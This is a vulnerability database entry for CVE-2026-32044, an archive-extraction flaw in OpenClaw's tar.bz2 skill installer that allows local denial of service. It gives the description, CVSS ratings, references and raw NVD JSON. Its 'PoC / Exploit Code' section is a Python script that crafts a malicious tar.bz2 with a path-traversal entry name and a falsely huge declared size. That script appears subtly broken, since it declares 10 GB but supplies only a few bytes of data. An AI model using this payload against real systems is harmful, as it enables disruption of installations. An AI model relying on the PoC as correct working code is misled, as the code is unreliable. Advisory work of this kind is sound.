CVE-2026-32044

Description

OpenClaw versions prior to 2026.3.2 contain an archive extraction vulnerability in the tar.bz2 installer path that bypasses safety checks enforced on other archive formats. Attackers can craft malicious tar.bz2 skill archives to bypass special-entry blocking and extracted-size guardrails, causing local denial of service during skill installation.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.3.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import tarfile
import io

# Create a malicious tar.bz2 payload to simulate the bypass of size guardrails
malicious_tar = io.BytesIO()

with tarfile.open(fileobj=malicious_tar, mode="w:bz2") as tar:
    # Create a TarInfo object representing a very large file
    info = tarfile.TarInfo(name="../../../../tmp/malicious_skill.dat")
    # Set a massive size (e.g., 10GB) to potentially trigger DoS upon extraction
    info.size = 1024 * 1024 * 1024 * 10
    
    # Add a small amount of actual data; the archive claims it is huge due to header
    # This exploits the lack of size checks before/during extraction
    tar.addfile(info, io.BytesIO(b"Malicious payload"))

# Save the malicious file
with open("exploit_skill.tar.bz2", "wb") as f:
    f.write(malicious_tar.getvalue())

print("Malicious tar.bz2 archive created successfully.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32044
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32044
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32044/
[4] VulDB https://vuldb.com/cve/CVE-2026-32044
[5] https://github.com/openclaw/openclaw/commit/0dbb92dd2bcf9a32379d11c0f11ed016669dae3e
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-77hf-7fqf-f227
[7] https://www.vulncheck.com/advisories/openclaw-tar-archive-safety-bypass-in-skills-installation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32044", "sourceIdentifier": "[email protected]", "published": "2026-03-21T01:17:06.950", "lastModified": "2026-03-23T17:10:11.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.3.2 contain an archive extraction vulnerability in the tar.bz2 installer path that bypasses safety checks enforced on other archive formats. Attackers can craft malicious tar.bz2 skill archives to bypass special-entry blocking and extracted-size guardrails, causing local denial of service during skill installation."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.3.2 contienen una vulnerabilidad de extracción de archivos en la ruta del instalador tar.bz2 que omite las comprobaciones de seguridad aplicadas a otros formatos de archivo. Los atacantes pueden crear archivos de habilidad tar.bz2 maliciosos para omitir el bloqueo de entradas especiales y las barreras de protección de tamaño extraído, causando una denegación de servicio local durante la instalación de la habilidad."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.2", "matchCriteriaId": "986EEC6C-F9E4-4B22-96D5-BBB98A4A738D"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/0dbb92dd2bcf9a32379d11c0f11ed016669dae3e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-77hf-7fqf-f227", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-tar-archive-safety-bypass-in-skills-installation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}